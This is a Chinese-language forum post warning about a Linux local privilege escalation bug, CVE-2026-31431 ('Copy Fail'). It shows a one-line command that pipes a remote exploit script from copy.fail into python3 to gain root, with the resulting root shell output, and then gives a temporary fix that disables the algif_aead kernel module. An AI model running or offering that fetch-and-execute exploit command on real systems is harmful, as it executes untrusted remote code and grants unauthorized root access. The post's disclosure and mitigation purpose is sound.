Linux 系统重大提权漏洞 2017年后所有系统均受影响 一行命令任意用户直接拿root 多数发行版仍未修复

Xint Copy Fail — 732 Bytes to Root CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk fi...
Linux 系统重大提权漏洞 2017年后所有系统均受影响 一行命令任意用户直接拿root 多数发行版仍未修复
Linux 系统重大提权漏洞 2017年后所有系统均受影响 一行命令任意用户直接拿root 多数发行版仍未修复

image

Xint

Copy Fail — 732 Bytes to Root

CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.

今天刚刚公布了一个 CVE-2026-31431
普通用户直接一行命令直接提权至root

这次POC发的非常早 导致绝大多数日用系统都还没有修复
包括 ubuntu 24 lts, debian 12 13 等

个人测试已经在多个大型项目的系统中复现
以下为非root执行后 直接拥有root权限

~$ curl https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   2592      0 --:--:-- --:--:-- --:--:--  2601
# id
uid=0(root)...
# whoami
root

强烈建议使用 https://copy.fail/ 中给的修复方法进行临时修复并等待上游更新
禁用 algif_aead 模块

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true

唯一的好消息就是对于绝大多数普通国内用户 都是直接root使用 而且还会有一层SSH 所以影响没有太大
但是对于会创建其他权限用户的程序 算是直接打通了shell到root的路
影响最大的是各大公司内部系统 很多采用的不是虚拟机而是Linux原生权限

34 个帖子 - 12 位参与者

阅读完整话题

来源: linux.do查看原文